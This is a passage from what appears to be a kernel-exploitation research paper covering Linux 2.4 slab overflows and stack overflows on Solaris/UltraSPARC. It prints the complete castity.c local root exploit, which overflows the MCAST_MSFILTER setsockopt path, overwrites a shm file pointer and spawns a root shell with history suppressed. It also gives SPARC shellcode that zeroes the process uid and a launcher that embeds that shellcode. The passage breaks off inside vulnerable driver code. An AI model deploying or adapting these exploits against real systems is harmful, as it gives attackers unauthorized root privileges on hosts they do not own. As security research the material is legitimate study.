need to find some object/data that gets kmalloc'ed in the same slab 
and 
which has inside a pointer or some crucial-value that would let us 
change
the execution flow.

We found a solution with the 'struct shmid_kernel' :

< linux-2.4.24/ipc/shm.c >

struct shmid_kernel /* private to the kernel */
{
        struct kern_ipc_perm    shm_perm;
        struct file *           shm_file;
        int                     id;
        [...]
};

[...]

asmlinkage long sys_shmget (key_t key, size_t size, int shmflg)
{
        struct shmid_kernel *shp;
        int err, id = 0;

        down(&shm_ids.sem);
        if (key == IPC_PRIVATE) {
                err = newseg(key, shmflg, size);
[...]

static int newseg (key_t key, int shmflg, size_t size)
{
[...]
        shp = (struct shmid_kernel *) kmalloc (sizeof (*shp), 
GFP_USER);
[...]
}

As you see, struct shmid_kernel is 64 bytes long and gets allocated 
using
kmalloc (size-64) generic cache [ we can alloc as many as we want 
(up to
fill the slab) using subsequent 'shmget' calls ].
Inside it there is a struct file pointer, that we could make point, 
thanks
to the overflow, to the userland, where we will emulate all the 
necessary
structs to reach a function pointer dereference (that's exactly 
what the
exploit does). 

Now it is time to force the msize value into being > 32 and =< 64, 
to make
it being alloc'ed inside the same (size-64) generic cache. 
'Good' values for gsf->gf_numsrc range from 0x40000005 to 
0x4000000c. 
That raises another problem : since we're able to write 4 bytes for
every __kernel_sockaddr_storage present in the gsf struct we need a 
pretty
large one to reach the 'shm_file' pointer, and so we need to pass a 
large
'optlen' value.
The 0x40000005 - 0x4000000c range, thou, makes the 
GROUP_FILTER_SIZE() macro
used at [4] evaluate to a positive and small value, which isn't 
large
enough to reach the 'shm_file' pointer. 

We solved that problem thanks to the fact that, once an object is 
free'd,
its 'memory contents' are not zero'ed (or cleaned in any way). 
Since the copy_from_user at [3] happens _before_ the check at [4], 
we were
able to create a sequence of 1024-sized objects by repeatedly 
issuing a
failing (at [4]) 'setsockopt', thus obtaining a large-enough one. 

Hoping to make it clearer let's sum up the steps :        

  - fill the 1024 slabs so that at next allocation a fresh one is 
returned 
  - alloc the first object of the new 1024-slab.
  - use as many 'failing' setsockopt as needed to copy values inside
    objects 2 and 3 [and 4, if needed, not the usual case thou] 
  - free the first object 
  - use a smaller (but still 1024-slab allocation driving) value for
    optlen that would pass the check at [4] 

At that point the gsf pointer points to the first object inside our
freshly created slab. Objects 2 and 3 haven't been re-used yet, so 
still
contains our data. Since the objects inside the slab are adiacent 
we have
a de-facto larger (and large enough) gsf struct to reach the 
'shm_file'
pointer. 

Last note, to reliably fill the slabs we check /proc/slabinfo. 
The exploit, called castity.c, was written when the advisory went 
out, and
is only for 2.4.* kernels (the sys_epoll vulnerability [12] was 
more than 
enough for 2.6.* ones ;) )

Exploit follows, just without the initial header, since the 
approach has
been already extensively explained above.
    
< stuff/expl/linux/castity.c >

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>

#define __u32           unsigned int
#define MCAST_MSFILTER  48
#define SOL_IP          0
#define SIZE            4096
#define R_FILE          "/etc/passwd"    // Set it to whatever file 
you
can read. It's just for 1024 filling.

struct in_addr {
   unsigned int   s_addr;
};

#define __SOCK_SIZE__   16

struct sockaddr_in {
  unsigned short        sin_family;     /* Address family           
    */
  unsigned short int    sin_port;       /* Port number              
    */
  struct in_addr        sin_addr;       /* Internet address         
    */

  /* Pad to size of `struct sockaddr'. */
  unsigned char         __pad[__SOCK_SIZE__ - sizeof(short int) -
                        sizeof(unsigned short int) - sizeof(struct
in_addr)];
};

struct group_filter
{
        __u32                   gf_interface;   /* interface index 
*/
        struct sockaddr_storage gf_group;       /* multicast 
address */
        __u32                   gf_fmode;       /* filter mode */
        __u32                   gf_numsrc;      /* number of 
sources */
        struct sockaddr_storage gf_slist[1];    /* interface index 
*/
};

struct  damn_inode      {
        void            *a, *b;
        void            *c, *d;
        void            *e, *f;
        void            *i, *l;
        unsigned long   size[40];  // Yes, somewhere here :-)
} le;


struct  dentry_suck     {
        unsigned int    count, flags;
        void            *inode;
        void            *dd;
} fucking = { 0xbad, 0xbad, &le, NULL };

struct  fops_rox        {
        void            *a, *b, *c, *d, *e, *f, *g;
        void            *mmap;
        void            *h, *i, *l, *m, *n, *o, *p, *q, *r;
        void            *get_unmapped_area;
} chien;



struct  file_fuck       {
        void            *prev, *next;
        void            *dentry;
        void            *mnt;
        void            *fop;
} gagne = { NULL, NULL, &fucking, NULL, &chien };



static char     stack[16384];

int             gotsig = 0,
                fillup_1024 = 0,
                fillup_64 = 0,
                uid, gid;

int             *pid, *shmid;



static void sigusr(int b)
{
        gotsig = 1;
}

void fatal (char *str)
{
        fprintf(stderr, "[-] %s\n", str);
        exit(EXIT_FAILURE);
}

#define BUFSIZE 256

int calculate_slaboff(char *name)
{
        FILE *fp;
        char slab[BUFSIZE], line[BUFSIZE];
        int ret;
        /* UP case */
        int active_obj, total;

        bzero(slab, BUFSIZE);
        bzero(line, BUFSIZE);

        fp = fopen("/proc/slabinfo", "r");
        if ( fp == NULL )
                fatal("error opening /proc for slabinfo");

        fgets(slab, sizeof(slab) - 1, fp);
        do {
                ret = 0;
                if (!fgets(line, sizeof(line) - 1, fp))
                        break;
                ret = sscanf(line, "%s %u %u", slab, &active_obj, 
&total);
        } while (strcmp(slab, name));

        close(fileno(fp));
        fclose(fp);

        return ret == 3 ? total - active_obj : -1;

}

int populate_1024_slab()
{
        int fd[252];
        int i;

        signal(SIGUSR1, sigusr);

        for ( i = 0; i < 252 ; i++)
                fd[i] = open(R_FILE, O_RDONLY);

        while (!gotsig)
                pause();
        gotsig = 0;

        for ( i = 0; i < 252; i++)
                close(fd[i]);

}


int kernel_code()
{
        int i, c;
        int *v;

        __asm__("movl   %%esp, %0" : : "m" (c));

        c &= 0xffffe000;
         v = (void *) c;


        for (i = 0; i < 4096 / sizeof(*v) - 1; i++) {
                if (v[i] == uid && v[i+1] == uid) {
                        i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
                }
                if (v[i] == gid) {
                        v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] 
= 0;
                        return -1;
                }
        }

        return -1;
}




void    prepare_evil_file ()
{
        int i = 0;

        chien.mmap = &kernel_code ;   // just to pass do_mmap_pgoff 
check
        chien.get_unmapped_area = &kernel_code;

        /*
         * First time i run the exploit i was using a precise 
offset for
         * size, and i calculated it _wrong_. Since then my 
lazyness took
         * over and i use that ""very clean"" *g* approach.
         * Why i'm telling you ? It's 3 a.m., i don't find any 
better than
         * writing blubbish comments
         */

        for ( i = 0; i < 40; i++)
                le.size[i] = SIZE;

}

#define SEQ_MULTIPLIER  32768

void    prepare_evil_gf ( struct group_filter *gf, int id )
{
        int                     filling_space = 64 - 4 * 
sizeof(int);
        int                     i = 0;
        struct sockaddr_in      *sin;

        filling_space /= 4;

        for ( i = 0; i < filling_space; i++ )
        {
              sin = (struct sockaddr_in *)&gf->gf_slist[i];
              sin->sin_family = AF_INET;
              sin->sin_addr.s_addr = 0x41414141;
        }

        /* Emulation of struct kern_ipc_perm */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = IPC_PRIVATE;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = -1;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = id/SEQ_MULTIPLIER;

        /* evil struct file address */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = (unsigned long)&gagne;

        /* that will stop mcast loop */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = 0xbad;
        sin->sin_addr.s_addr = 0xdeadbeef;

        return;

}

void    cleanup ()
{
        int                     i = 0;
        struct shmid_ds         s;

        for ( i = 0; i < fillup_1024; i++ )
        {
                kill(pid[i], SIGUSR1);
                waitpid(pid[i], NULL, __WCLONE);
        }

        for ( i = 0; i < fillup_64 - 2; i++ )
                shmctl(shmid[i], IPC_RMID, &s);

}


#define EVIL_GAP        4
#define SLAB_1024       "size-1024"
#define SLAB_64         "size-64"
#define OVF             21
#define CHUNKS          1024
#define LOOP_VAL        0x4000000f
#define CHIEN_VAL       0x4000000b

main()
{
        int                     sockfd, ret, i;
        unsigned int            true_alloc_size, last_alloc_chunk, 
loops;
        char                    *buffer;
        struct group_filter     *gf;
        struct shmid_ds         s;

        char    *argv[] = { "le-chien", NULL };
        char    *envp[] = { "TERM=linux", "PS1=le-chien\\$",
"BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null",
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
"HISTFILE=/dev/null", NULL };


        true_alloc_size = sizeof(struct group_filter) - 
sizeof(struct
sockaddr_storage) + sizeof(struct sockaddr_storage) * OVF;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        uid = getuid();
        gid = getgid();

        gf = malloc (true_alloc_size);
        if ( gf == NULL )
                fatal("Malloc failure\n");

        gf->gf_interface = 0;
        gf->gf_group.ss_family = AF_INET;

        fillup_64 = calculate_slaboff(SLAB_64);

        if ( fillup_64 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_64, fillup_64);

        /* Yes, two would be enough, but we have that "sexy" 
#define, why
don't use it ? :-) */

        fillup_64 += EVIL_GAP;

        shmid = malloc(fillup_64 * sizeof(int));
        if ( shmid == NULL )
                fatal("Malloc failure\n");

        /* Filling up the size-64 and obtaining a new page with 
EVIL_GAP
entries */

        for ( i = 0; i < fillup_64; i++ )
                shmid[i] = shmget(IPC_PRIVATE, 4096, 
IPC_CREAT|SHM_R);

        prepare_evil_file();
        prepare_evil_gf(gf, shmid[fillup_64 - 1]);

        buffer = (char *)gf;

        fillup_1024 = calculate_slaboff(SLAB_1024);
        if ( fillup_1024 == -1 )
                fatal("Error calculating slab fillup\n");

        printf("[+] Slab %s fillup is %d\n", SLAB_1024, 
fillup_1024);

        fillup_1024 += EVIL_GAP;


        pid = malloc(fillup_1024 * sizeof(int));
        if (pid  == NULL )
                fatal("Malloc failure\n");

        for ( i = 0; i < fillup_1024; i++)
                pid[i] = clone(populate_1024_slab, stack + 
sizeof(stack) -
4, 0, NULL);

        printf("[+] Attempting to trash size-1024 slab\n");

        /* Here starts the loop trashing size-1024 slab */

        last_alloc_chunk = true_alloc_size % CHUNKS;
        loops = true_alloc_size / CHUNKS;

        gf->gf_numsrc = LOOP_VAL;

        printf("[+] Last size-1024 chunk is of size %d\n",
last_alloc_chunk);
        printf("[+] Looping for %d chunks\n", loops);

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        if ( last_alloc_chunk > 512  )
                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, 
buffer +
loops * CHUNKS, last_alloc_chunk);
        else

        /*
         * Should never happen. If it happens it probably means 
that we've
         * bigger datatypes (or slab-size), so probably
         * there's something more to "fix me". The while loop below 
is
         * already okay for the eventual fixing ;)
         */
  
              fatal("Last alloc chunk fix me\n");

        while ( loops > 1 )
        {
                kill(pid[--fillup_1024], SIGUSR1);
                waitpid(pid[fillup_1024], NULL, __WCLONE);

                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, 
buffer +
--loops * CHUNKS, CHUNKS);
        }

        /* Let's the real fun begin */

        gf->gf_numsrc = CHIEN_VAL;

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        shmctl(shmid[fillup_64 - 2], IPC_RMID, &s);
        setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer, CHUNKS);

        cleanup();

        ret = (unsigned long)shmat(shmid[fillup_64 - 1], NULL,
SHM_RDONLY);


        if ( ret == -1)
        {
                printf("Le Fucking Chien GAGNE!!!!!!!\n");
                setresuid(0, 0, 0);
                setresgid(0, 0, 0);
                execve("/bin/sh", argv, envp);
                exit(0);
        }

        printf("Here we are, something sucked :/ (if not L1_cache 
too big,
probably slab align, retry)\n" );

}
   
< / > 


------[ 2.3 - Stack overflow vulnerabilities


When a process is in 'kernel mode' it has a stack which is 
different from
the stack it uses at userland. We'll call it 'kernel stack'. 
That kernel stack is usually limited in size to a couple of pages 
(on
Linux, for example, it is 2 pages, 8kb, but an option at compile 
time 
exist to have it limited at one page) and is not a surprise that a 
common
design practice in kernel code developing is to use locally to a 
function
as little stack space as possible.

At a first glance, we can imagine two different scenarios that 
could go
under the name of 'stack overflow vulnerabilities' :

 - 'standard' stack overflow vulnerability : a write past a buffer 
on the
   stack overwrites the saved instruction pointer or the frame 
pointer
   (Solaris only, Linux is compiled with -fomit-frame-pointer) or 
some
   variable (usually a pointer) also located in the stack. 

 - 'stack size overflow' : a deeply nested callgraph goes further 
the
   alloc'ed stack space.  

Stack based explotation is more architectural and o.s. specific 
than the
already presented slab based one.
That is due to the fact that once the stack is trashed we achieve
execution flow hijack, but then we must find a way to somehow 
return to
userland. We con't cover here the details of x86 architecture, 
since those
have been already very well explained by noir in his phrack60 paper 
[13]. 

We will instead focus on the UltraSPARC architecture and on its more
common operating system, Solaris. The next subsection will describe 
the
relevant details of it and will present a technique which is 
suitable
aswell for the exploiting of slab based overflow (or, more 
generally,
whatever 'controlled flow redirection' vulnerability). 

The AMD64 architecture won't be covered yet, since it will be our 
'example
architecture' for the next kind of vulnerabilities (race 
condition). The
sendmsg [5] exploit proposed later on is, at the end, a stack based 
one.

Just before going on with the UltraSPARC section we'll just spend a 
couple
of words describing the return-to-ring3 needs on an x86 
architecture and
the Linux use of the kernel stack (since it quite differs from the 
Solaris
one). 

Linux packs together the stack and the struct associated to every 
process
in the system (on Linux 2.4 it was directly the task_struct, on 
Linux 2.6
it is the thread_info one, which is way smaller and keeps inside a 
pointer
to the task_struct). This memory area is, by default, 8 Kb (a kernel
option exist to have it limited to 4 Kb), that is the size of two 
pages,
which are allocated consecutively and with the first one aligned to 
a 2^13
multiple. The address of the thread_struct (or of the task_struct) 
is thus
calculable at runtime by masking out the 13 least significant bits 
of the
Kernel Stack (%esp).  

The stack starts at the bottom of this page and 'grows' towards the 
top,
where the thread_info (or the task_struct) is located. To prevent 
the
'second' type of overflow when the 4 Kb Kernel Stack is selected at
compile time, the kernel uses two adjunctive per-CPU stacks, one for
interrupt handling and one for softirq and tasklets functions, both 
one
page sized. 

It is obviously on the stack that Linux stores all the information 
to
return from exceptions, interrupts or function calls and, 
logically, to 
get back to ring3, for example by means of the iret instruction. 
If we want to use the 'iret' instruction inside our shellcodes to 
get out
cleanly from kernel land we have to prepare a fake stack frame as it
expects to find.

We have to supply:
  - a valid user space stack pointer
  - a valid user space instruction pointer
  - a valid EFLAGS saved EFLAGS register
  - a valid User Code Segment
  - a valid User Stack Segment

 LOWER ADDRESS
 +-----------------+
 |                 |
 |   User SS       | -+
 |   User ESP      |  |
 |   EFLAGS        |  |  Fake Iret Frame
 |   User CS       |  |
 |   User EIP      | -+  <----- current kernel stack pointer (ESP)
 |                 |
 +-----------------+
 
We've added a demonstrative stack based exploit (for the Linux 
dummy 
driver) which implements a shellcode doing that recovery-approach :

  movl   $0x7b,0x10(%esp)       // user stack segment (SS)
  movl   $stack_chunk,0xc(%esp) // user stack pointer (ESP)
  movl   $0x246,0x8(%esp)       // valid EFLAGS saved register
  movl   $0x73,0x4(%esp)        // user code segment (CS)
  movl   $code_chunk,0x0(%esp)  // user code pointer  (EIP)
  iret

You can find it in < expl/linux/stack_based.c > 


---[ 2.3.1 - UltraSPARC exploiting


The UltraSPARC [14] is a full implementation of the SPARC V9 64-bit 
[2] 
architecture. The most 'interesting' part of it from an exploiting
perspective is the support it gives to the operating system for a 
fully
separated address space among userspace and kernelspace.

This is achieved through the use of context registers and address 
space
identifiers 'ASI'. The UltraSPARC MMU provides two settable context
registers, the primary (PContext) and the secondary (SContext) one. 
One
more context register hardwired to zero is provided, which is the 
nucleus
context ('context' 0 is where the kernel lives).
To every process address space is associated a 'context value', 
which is
set inside the PContext register during process execution. This 
value is
used to perform memory addresses translation. 

Every time a process issues a trap instruction to access kernel 
land (for
example ta 0x8 or ta 0x40, which is how system call are implemented 
on
Solaris 10), the nucleus context is set as default. The process 
context
value (as recorded inside PContext) is then moved to SContext, 
while the
nucleus context becomes the 'primary context'. 

At that point the kernel code can access directly the userland by
specifying the correct ASI to a load or store alternate instruction
(instructions that support a direct asi immediate specified - 
lda/sta). 
Address Space Identifiers (ASIs) basically specify how those 
instruction
have to behave :

< usr/src/uts/sparc/v9/sys/asi.h >

#define ASI_N                   0x04    /* nucleus */
#define ASI_NL                  0x0C    /* nucleus little */
#define ASI_AIUP                0x10    /* as if user primary */
#define ASI_AIUS                0x11    /* as if user secondary */
#define ASI_AIUPL               0x18    /* as if user primary 
little */
#define ASI_AIUSL               0x19    /* as if user secondary 
little */

[...]

#define ASI_USER        ASI_AIUS

< / > 

Theese are ASI that are specified by the SPARC v9 reference (more 
ASI are
machine dependant and let modify, for example, MMU or other hardware
registers, check usr/src/uts/sun4u/sys/machasi.h), the 'little' 
version is
just used to specify a byte ordering access different from the 
'standard'
big endian one (SPARC v9 can access data in both formats).

The ASI_USER is the one used to access, from kernel land, the user 
space. 
An instruction like :

       ldxa [addr]ASI_USER, %l1 

would just load the double word stored at 'addr', relative to the 
address
space contex stored in the SContext register, 'as if' it was 
accessed by
userland code (so with all protection checks). 

It is thus possible, if able to start executing a minimal stub of 
code, to
copy bytes from the userland wherever we want at kernel land.  

But how do we execute code at first ? Or, to make it even more 
clearer,
where do we return once we have performed our (slab/stack) overflow 
and
hijacked the instruction pointer ? 

To complicate things a little more, the UltraSPARC architecture 
implements
the execution bit permission over TTEs (Translation Table Entry, 
which are
the TLB entries used to perform virtual/physical translations). 

It is time to give a look at Solaris Kernel implementation to find a
solution. The technique we're going to present now (as you'll 
quickly
figure out) is not limited to stack based exploiting, but can be 
used
every time you're able to redirect to an arbitrary address the 
instruction 
flow at kernel land.


---] 2.3.2 - A reliable Solaris/UltraSPARC exploit


The Solaris process model is slightly different from the Linux one. 
The
foundamental unit of scheduling is the 'kernel thread' (described 
by the
kthread_t structure), so one has to be associated to every existing 
LWP 
(light-weight process) in a process.
LWPs are just kernel objects which represent the 'kernel state' of 
every
'user thread' inside a process and thus let each one enter the 
kernel
indipendently (without LWPs, user thread would contend at system 
call).

The information relative to a 'running process' are so scattered 
among
different structures. Let's see what we can make out of them. 
Every Operating System (and Solaris doesn't differ) has a way to 
quickly
get the 'current running process'. On Solaris it is the 'current 
kernel
thread' and it's obtained, on UltraSPARC, by :

#define curthread       (threadp())  

< usr/src/uts/sparc/ml/sparc.il >

! return current thread pointer

        .inline threadp,0
        .register %g7, #scratch
        mov     %g7, %o0
        .end

< / > 

It is thus stored inside the %g7 global register. 
From the kthread_t struct we can access all the other 'process 
related'
structs. Since our main purpose is to raise privileges we're 
interested in
where the Solaris kernel stores process credentials. 

Those are saved inside the cred_t structure pointed to by the 
proc_t one :

# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 
snmpdx
0000030000e67488::print proc_t
{
    p_exec = 0x30000e5b5a8
    p_as = 0x300008bae48
    p_lockp = 0x300006167c0
    p_crlock = {
        _opaque = [ 0 ]
    }
    p_cred = 0x3000026df28
[...]
0x3000026df28::print cred_t
{
    cr_ref = 0x67b
    cr_uid = 0
    cr_gid = 0
    cr_ruid = 0
    cr_rgid = 0
    cr_suid = 0
    cr_sgid = 0
    cr_ngroups = 0
    cr_groups = [ 0 ]
}
::offsetof proc_t p_cred
offsetof (proc_t, p_cred) = 0x20
::quit

#

The '::ps' dcmd ouput introduces a very interesting feature of the 
Solaris
Operating System, which is a god-send for exploiting.
The address of the proc_t structure in kernel land is exported to
userland : 

bash-2.05$ ps -aef -o addr,comm | grep snmpdx
     30000e67488 /usr/lib/snmp/snmpdx
bash-2.05$

At a first glance that could seem of not great help, since, as we 
said, 
the kthread_t struct keeps a pointer to the related proc_t one :

::offsetof kthread_t t_procp
offsetof (kthread_t, t_procp) = 0x118
::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 
snmpdx
0000030000e67488::print proc_t p_tlist
p_tlist = 0x30000e52800
0x30000e52800::print kthread_t t_procp
t_procp = 0x30000e67488


To understand more precisely why the exported address is so 
important we
have to take a deeper look at the proc_t structure. 
This structure contains the user_t struct, which keeps information 
like
the program name, its argc/argv value, etc : 

0000030000e67488::print proc_t p_user
[...]
    p_user.u_ticks = 0x95c
    p_user.u_comm = [ "snmpdx" ]
    p_user.u_psargs = [ "/usr/lib/snmp/snmpdx -y -c /etc/snmp/conf" 
]
    p_user.u_argc = 0x4
    p_user.u_argv = 0xffbffcfc
    p_user.u_envp = 0xffbffd10
    p_user.u_cdir = 0x3000063fd40
[...]

We can control many of those. 
Even more important, the pages that contains the process_cache (and 
thus
the user_t struct), are not marked no-exec, so we can execute from 
there
(for example the kernel stack, allocated from the seg_kp [kernel 
pageable
memory] segment, is not executable). 

Let's see how 'u_psargs' is declared :

< usr/src/common/sys/user.h >
#define PSARGSZ         80      /* Space for exec arguments (used by
ps(1)) */
#define MAXCOMLEN       16      /* <= MAXNAMLEN, >= sizeof 
(ac_comm) */

[...]

typedef struct  user {
        /*
         * These fields are initialized at process creation time 
and never
         * modified.  They can be accessed without acquiring locks.
         */
        struct execsw *u_execsw;        /* pointer to exec switch 
entry */
        auxv_t  u_auxv[__KERN_NAUXV_IMPL]; /* aux vector from exec 
*/
        timestruc_t u_start;            /* hrestime at process 
start */
        clock_t u_ticks;                /* lbolt at process start */
        char    u_comm[MAXCOMLEN + 1];  /* executable file name 
from exec
*/
        char    u_psargs[PSARGSZ];      /* arguments from exec */
        int     u_argc;                 /* value of argc passed to 
main()
*/
        uintptr_t u_argv;               /* value of argv passed to 
main()
*/
        uintptr_t u_envp;               /* value of envp passed to 
main()
*/
  
[...]

< / >

The idea is simple : we put our shellcode on the command line of our
exploit (without 'zeros') and we calculate from the exported proc_t
address the exact return address.
This is enough to exploit all those situations where we have 
control of
the execution flow _without_ trashing the stack (function pointer
overwriting, slab overflow, etc). 

We have to remember to take care of the alignment, thou, since the
UltraSPARC fetch unit raises an exception if the address it reads 
the
instruction from is not aligned on a 4 bytes boundary (which is the 
size
of every sparc instruction) :

::offsetof proc_t p_user
offsetof (proc_t, p_user) = 0x330
::offsetof user_t u_psargs
offsetof (user_t, u_psargs) = 0x161


Since the proc_t taken from the 'process cache' is always aligned 
to an 8
byte boundary, we have to jump 3 bytes after the starting of the 
u_psargs
char array (which is where we'll put our shellcode).  
That means that we have space for 76 / 4 = 19 instructions, which is
usually enough for average shellcodes.. but space is not really a 
limit
since we can 'chain' more psargs struct from different processes, 
simply
jumping from each others. Moreover we could write a two stage 
shellcode
that would just start copying over our larger one from the userland 
using
the load from alternate space instructions presented before. 

We're now facing a slightly more complex scenario, thou, which is 
the
'kernel stack overflow'. We assume here that you're somehow 
familiar with
userland stack based exploiting (if you're not you can check [15] 
and
[16]). 
The main problem here is that we have to find a way to safely 
return to
userland once trashed the stack (and so, to reach the instruction 
pointer,
the frame pointer). A good way to understand how the 'kernel stack' 
is
used to return to userland is to follow the path of a system call. 
You can get a quite good primer here [17], but we think that a read
through opensolaris sources is way better (you'll see also, 
following the
sys_trap entry in uts/sun4u/ml/mach_locore.s, the code setting the 
nucleus
context as the PContext register). 

Let's focus on the 'kernel stack' usage : 

< usr/src/uts/sun4u/ml/mach_locore.s >

        ALTENTRY(user_trap)
        !
        ! user trap
        !
        ! make all windows clean for kernel
        ! buy a window using the current thread's stack
        !
        sethi   %hi(nwin_minus_one), %g5
        ld      [%g5 + %lo(nwin_minus_one)], %g5
        wrpr    %g0, %g5, %cleanwin
        CPU_ADDR(%g5, %g6)
        ldn     [%g5 + CPU_THREAD], %g5
        ldn     [%g5 + T_STACK], %g6
        sub     %g6, STACK_BIAS, %g6
        save    %g6, 0, %sp
  
< / > 

In %g5 is saved the number of windows that are 'implemented' in the
architecture minus one, which is, in that case, 8 - 1 = 7.
CLEANWIN is set to that value since there are no windows in use out 
of the
current one, and so the kernel has 7 free windows to use. 

The cpu_t struct addr is then saved in %g5 (by CPU_ADDR) and, from 
there,
the thread pointer [ cpu_t->cpu_thread ] is obtained. 
From the kthread_t struct is obtained the 'kernel stack address' 
[the
member name is called t_stk]. This one is a good news, since that 
member
is easy accessible from within a shellcode (it's just a matter of
correctly accessing the %g7 / thread pointer). From now on we can 
follow
the sys_trap path and we'll be able to figure out what we will find 
on the
stack just after the kthread_t->t_stk value and where. 

To that value is then subtracted 'STACK_BIAS' : the 64-bit v9 SPARC 
ABI
specifies that the %fp and %sp register are offset by a constant, 
the
stack bias, which is 2047 bits. This is one thing that we've to 
remember
while writing our 'stack fixup' shellcode. 
On 32-bit running kernels the value of this constant is 0. 

The save below is another good news, because that means that we can 
use
the t_stk value as a %fp (along with the 'right return address') to 
return
at 'some valid point' inside the syscall path (and thus let it flow 
from
there and cleanily get back to userspace). 

The question now is : at which point ? Do we have to 'hardcode' that
return address or we can somehow gather it ? 

A further look at the syscall path reveals that :

        ENTRY_NP(utl0)
        SAVE_GLOBALS(%l7)
        SAVE_OUTS(%l7)
        mov     %l6, THREAD_REG
        wrpr    %g0, PSTATE_KERN, %pstate       ! enable ints
        jmpl    %l3, %o7                        ! call trap handler
        mov     %l7, %o0

And, that %l3 is : 

have_win:
        SYSTRAP_TRACE(%o1, %o2, %o3)


        !
        ! at this point we have a new window we can play in,
        ! and %g6 is the label we want done to bounce to
        !
        ! save needed current globals
        !
        mov     %g1, %l3        ! pc
        mov     %g2, %o1        ! arg #1
        mov     %g3, %o2        ! arg #2
        srlx    %g3, 32, %o3    ! pseudo arg #3
        srlx    %g2, 32, %o4    ! pseudo arg #4
 
%g1 was preserved since : 

#define SYSCALL(which)                  \
        TT_TRACE(trace_gen)             ;\
        set     (which), %g1            ;\
        ba,pt   %xcc, sys_trap          ;\
        sub     %g0, 1, %g4             ;\
        .align  32

and so it is syscall_trap for LP64 syscall and syscall_trap32 for 
ILP32
syscall. Let's check if the stack layout is the one we expect to 
find :

::ps ! grep snmp
R    291      1    291    291     0 0x00020008 0000030000db4060 
snmpXdmid
R    278      1    278    278     0 0x00010008 0000030000d2f488 
snmpdx
::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000d2f488 
snmpdx
0000030000d2f488::print proc_t p_tlist
p_tlist = 0x30001dd4800
0x30001dd4800::print kthread_t t_stk
t_stk = 0x2a100497af0 ""
0x2a100497af0,16/K
0x2a100497af0:  1007374         2a100497ba0     30001dd2048     
1038a3c
                1449e10         0               30001dd4800
                2a100497ba0     ffbff700        3               
3a980
                0               3a980           0
                ffbff6a0        ff1525f0        0               0
                0               0               0
                0
syscall_trap32=X
                1038a3c

  
Analyzing the 'stack frame' we see that the saved %l6 is exactly
THREAD_REG (the thread value, 30001dd4800) and %l3 is 1038a3c, the
syscall_trap32 address. 

At that point we're ready to write our 'shellcode' : 

# cat sparc_stack_fixup64.s

..globl begin
..globl end

begin:
        ldx [%g7+0x118], %l0
        ldx [%l0+0x20], %l1
        st %g0, [%l1 + 4]
        ldx [%g7+8], %fp
        ldx [%fp+0x18], %i7
        sub %fp,2047,%fp
        add 0xa8, %i7, %i7

        ret
        restore
end:
#

At that point it should be quite readable : it gets the t_procp 
address
from the kthread_t struct and from there it gets the p_cred addr.
It then sets to zero (the %g0 register is hardwired to zero) the 
cr_uid
member of the cred_t struct and uses the kthread_t->t_stk value to 
set
%fp. %fp is then dereferenced to get the 'syscall_trap32' address 
and the
STACK_BIAS subtraction is then performed. 

The add 0xa8 is the only hardcoded value, and it's the 'return 
place'
inside syscall_trap32. You can quickly derive it from a ::findstack 
dcmd
with mdb. A more advanced shellcode could avoid this 'hardcoded 
value' by
opcode scanning from the start of the syscall_trap32 function and 
looking
for the jmpl %reg,%o7/nop sequence (syscall_trap32 doesn't get a new
window, and stays in the one sys_trap had created) pattern. 
On all the boxes we tested it was always 0xa8, that's why we just 
left it
hardcoded. 

As we said, we need the shellcode to be into the command line, 
'shifted' 
of 3 bytes to obtain the correct alignment. To achieve that a simple
launcher code was used :

bash-2.05$ cat launcer_stack.c
#include <unistd.h>

char sc[] = "\x66\x66\x66"              // padding for alignment
"\xe0\x59\xe1\x18\xe2\x5c\x20\x20\xc0\x24\x60\x04\xfc\x59\xe0"
"\x08\xfe\x5f\xa0\x18\xbc\x27\xa7\xff\xbe\x07\xe0\xa8\x81"
"\xc7\xe0\x08\x81\xe8\x00\x00";

int main()
{
        execl("e", sc, NULL);
        return 0;
}
bash-2.05$

The shellcode is the one presented before. 

Before showing the exploit code, let's just paste the vulnerable 
code,
from the dummy driver provided for Solaris :

< stuff/drivers/solaris/test.c >

[...]

static int handle_stack (intptr_t arg)
{
        char buf[32];
        struct test_comunique t_c;

        ddi_copyin((void *)arg, &t_c, sizeof(struct 
test_comunique), 0);

